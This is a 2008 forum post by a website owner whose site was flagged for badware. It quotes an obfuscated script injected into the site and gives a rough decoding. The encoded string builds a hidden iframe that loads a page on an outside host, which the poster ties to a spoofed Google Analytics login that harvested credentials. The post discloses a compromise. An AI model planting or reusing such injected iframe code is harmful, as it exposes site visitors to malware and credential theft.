mcmunsta - 3:49 pm on May 14, 2008 (gmt 0)

I posted this on another thread related to data loss by Google Analytics however I think this is relevent to this discussion as well...

Recently my website was labled as as hosting badware. I have always ran a clean site and have advertised using the Google Adwords program for several years.
Google would only tell me that they see a malicous code on our site, one that I had trouble identifying.

Then yesterday morning I found a code which I thought looked suspect. It was written in a cypher and originally I thought it was just part of the programming behind the site. After looking at the string of code in more detail I realized that it was a cypher, in fact an easy one in which to decode.

Here is the original code:

="=tdsjqu?!wbs!Tus>#33(!xjeui>2!ifjhiu>2!tuzmf>(wjtjcjmjuz;!ijeefo(?=0jg
sbnf?=jgsbnf!tsd>(iuuq;00mfpijo/dpn0ejbnpoe0j0joefy/qiq@pvu>33#..epdvnfo
u/xsjuf)Tus/tvctusjoh)68-226*-Tus/tvctusjoh)1-68**!=0tdsjqu?";

And here is what I translated it to:

script – var – str – width – height – style – visibility – hidden – I – frame – I – frame – iframe – src – http://www.example.com.diamond.i.index/php.out - document - write – str – substring – 68-226 – str – substring – 1-68 – script

Heres where it gets interesting.

If you were to go to example.com you would see that it was a spoofed Google Analytics site. Google as of last night has been working at getting that site taken down however from what I can discern it has been up for about three months. I have a screen shot of the spoofed Analytics site. It appears it would ask for a users login information and then capture that information before sending the person through to the Google Analytics site.

I don't know if these issues are resolved however they very well may be. It is also possible that other Google Analytics accounts have been breached like ours may have been.

It is ironic that Google flagged our account as providing malicous code and would not assist us other than verify that the code was still on the site and then it turns out that the code led back to a spoofed Google Analytics site. I've yet to hear much back regarding this but it seems interesting that I recieved notification of data loss on the analytics side during the same time this other issue was going on.

I've asked Google if there has been a security breach and will update this thread once I receive a response.

[edited by: Robert_Charlton at 6:35 pm (utc) on May 14, 2008]
[edit reason] changed to example.com [/edit]